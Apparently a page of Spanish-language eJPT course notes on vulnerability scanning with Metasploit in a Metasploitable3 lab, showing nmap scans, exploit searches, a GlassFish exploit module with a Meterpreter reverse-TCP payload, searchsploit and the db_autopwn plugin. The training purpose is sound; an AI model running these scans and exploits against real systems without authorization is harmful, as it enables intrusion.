eJPT
  • 馃憢Welcome
  • Tools
    • 馃敪Escaneo y Enumeraci贸n
  • SECTION 1: Assessment Methodologies
    • Assessment Methodologies: Information Gathering
      • Introducci贸n a la Recopilaci贸n de Informaci贸n
        • Start Quiz
      • Passive Information Gathering
      • Active Information Gathering
    • Assessment Methodologies: Footprinting & Scanning
      • Introduction
      • Networking Primer
      • Host Discovery
      • Port Scanning
      • Evasion, Scan Performance & Output
      • Page
      • Challenges
    • Assessment Methodologies: Enumeration
      • Overview
      • SMB Lesson
      • FTP Lesson
      • SSH Lesson
      • HTTP Lesson
      • SQL Lesson
    • Assessment Methodologies: Vulnerability Assessment
      • Vulnerability Assessment
      • Course Labs
  • SECTION 2: Host & Networking Auditing
    • Assessment Methodologies: Auditing Fundamentals
      • Assessment Methodologies
      • Practice
  • SECTION 3: Host & Network Penetration Testing
    • Host & Network Penetration Testing: System/Host Based Attacks
      • Introduction to Attacks
      • Windows Vulnerabilities
      • Exploiting Windows Vulnerabilities
      • Windows Privilege Escalation
      • Windows File System Vulnerabilities
      • Windows Credential Dumping
      • Linux Vulnerabilities
      • Exploiting Linux Vulnerabilities
      • Linux Privilege Escalation
      • Linux Credential Dumping
      • Conclusion
    • Host & Network Penetration Testing: Network-Based Attacks
      • Network-Based Attacks
    • Host & Network Penetration Testing: The Metasploit Framework (MSF)
      • Metasploit
        • Metasploit Fundamentals
      • Information Gathering & Enumeration
        • Nmap
        • Enumeration
      • Vulnerability Scanning
        • MSF
        • Nessus
        • Web Apps
      • Client-Side Attacks
        • Payloads
        • Automating
      • Exploitation
        • Windows Exploitation
        • Linux Exploitation
        • Post Exploitation Fundamentals
        • Windows Post Exploitation
        • Linux Post Exploitation
      • Armitage
        • Metasploit GUIs
    • Host & Network Penetration Testing: Exploitation
      • Introduction To Exploitation
      • Vulnerability Scanning Overview
      • Exploits
        • Searching For Exploits
        • Fixing Exploits
      • Shells
      • Frameworks
      • Windows
      • Linux
      • Obfuscation
    • Host & Network Penetration Testing: Post-Exploitation
      • Introduction
      • Windows Enumeration
      • Linux Enumeration
      • Transferring Files
      • Shells
      • Escalation
        • Windows Privilege Escalation
        • Linux Privilege Escalation
      • Persistence
        • Windows Persistence
        • Linux Persistence
      • Dumping & Cracking
        • Windows Password Hashes
        • Linux Password Hashes
      • Pivoting Lesson
      • Clearing
  • Host & Network Penetration Testing: Social Engineering
    • Social Engineering
  • SECTION 4: Web Application Penetration Testing
    • Introduction to the Web & HTTP Protocol
      • Web Applications
      • HTTP Protocol
        • HTTP/S Protocol Fundamentals
        • Website Crawling & Spidering
Powered by GitBook
On this page
  • Vulnerability Scanning With MSF
  • Lab Environment
  • Demo: Vulnerability Scanning With MSF
  • Quiz: Vulnerability Scanning With MSF
  1. SECTION 3: Host & Network Penetration Testing
  2. Host & Network Penetration Testing: The Metasploit Framework (MSF)
  3. Vulnerability Scanning

MSF

Vulnerability Scanning With MSF

El escaneo y detecci贸n de vulnerabilidades es el proceso de escanear un objetivo en busca de vulnerabilidades y verificar si pueden explotarse.

Hasta ahora, hemos podido identificar y explotar configuraciones err贸neas en los sistemas de destino; sin embargo, en esta secci贸n exploraremos el proceso de utilizaci贸n de m贸dulos auxiliares y de explotaci贸n para escanear e identificar vulnerabilidades inherentes en servicios, sistemas operativos y aplicaciones web.

Esta informaci贸n ser谩 煤til durante la fase de explotaci贸n de este curso.

Tambi茅n exploraremos el proceso de utilizaci贸n de herramientas de escaneo de vulnerabilidades de terceros como Nessus y c贸mo podemos integrar la funcionalidad de Nessus en MSF.

Lab Environment

Para demostrar el proceso de escaneo de vulnerabilidades, utilizaremos una m谩quina virtual intencionalmente vulnerable llamada Metasploitable3 que se basa en Windows Server 2008.

Metasploitable3 fue desarrollado por Rapid7 para demostrar c贸mo se puede utilizar MSF para realizar la explotaci贸n de un sistema Windows.

Las instrucciones sobre c贸mo se puede configurar esta m谩quina virtual se pueden encontrar aqu铆: https://bit.ly/3kASwns

Demo: Vulnerability Scanning With MSF

# Reconocimiento de red
sudo nmap -sn x.x.x.x/24

# Inicializamos los servicios de metasploit
service postgresql start
[ 0k ] Starting PostgreSQL 11 database server: main.
msfconsole
db_status

# Configuramos el espacio de trabajo [Workspace]
msf5 > workspace -a MS3
[ * ] Added workspace:
Workspace: MS3



# Configurar la IP de la victima/hacker en la variable general
msf5 > setg RHOSTS 192.140.160.3
RHOSTS 192.140.160.3
msf5 > setg RHOST 192.140.160.3
RHOST 192.140.160.3

# Realizamos un scaneo
db_nmap -sS -sV -O <Target>

######################### Resultados del Escaneo #############################
# Informacion de los Host escaneados
msf6 > hosts
# Servicios listados basados en el host segun el escaneo realizado
msf6 > services
##############################################################################

# Buscar una vulnerabilidad basado en la version
msf6 > search type:exploit name:Microsoft IIS <Version>

# En caso de que solo tengamos un modulo, ver si funciona el exploit en la version
# que queremos
msf6 > search Sun GlassFish
# Usamos el modulo y nos pedira configurar un payload
msf6 > use exploit/multi/http/glassfish_deployer
    [*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
# Tambien puede ver informacion del payload donde nos indicara en que  
# versiones o como funciona el exploit
msf6 exploit(multi/http/gtassfish_deployer) > info
# Configuracion del payload
msf6 exploit(multi/http/gtassfish_deployer) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/gtassfish_deployer) > show options

# Tambien podemos buscar exploits que esten fuera y dentro del modulo del MSF
# utilizando una terminal 
kaliakali:-$ searchsploit "Microsoft windows SMB"
# Solo filtraremos modulos que esten dentro del modulo de MSF
kaliakali:-$ searchsploit "Microsoft windows SMB" | grep -e "Metasploit"
# Identificado el exploit el mismo se utilizara y buscara en metasploit
# por lo caul se debera de utilizar con el comando use y buscar con search

Tambien podemos utilizar el proceso del DB AUTOCOMPLEMTO PLUGIN, en el siguiente enlase le indicara una breve descripcion del complemento de Metasploit para una facil explotacion y vulnerabilidad de ataque. Lo que significa es que se utiliza esencialmente para identificar m贸dulos de explotaci贸n para los puertos que est谩n actualmente abiertos en un sistema de destino.

Pasos antes de su utlizacion:

  1. Descargar

  2. Mover al directorio de /usr/share/metasploit-framework/plugins

  3. Cargar a metasploit

msf6 > load db_autopwn

[*] Successfully loaded plugin: db_autopwn

msf6 > db_autopwn

msf6 > db_autopwn -p -t -PI 445

Tambien se puede utilizar el comando Analyze, el cual analizara el contenido de la base de datos de metasploit, entonces sus hosts y servicios y luego le proporcionara una lista de vulnerabilidades

msf6 > analyze

msf6 > vulns

Quiz: Vulnerability Scanning With MSF

PreviousVulnerability ScanningNextNessus

Last updated 10 months ago

GitHub - hahwul/metasploit-autopwn: db_autopwn plugin of metasploitGitHub
Logo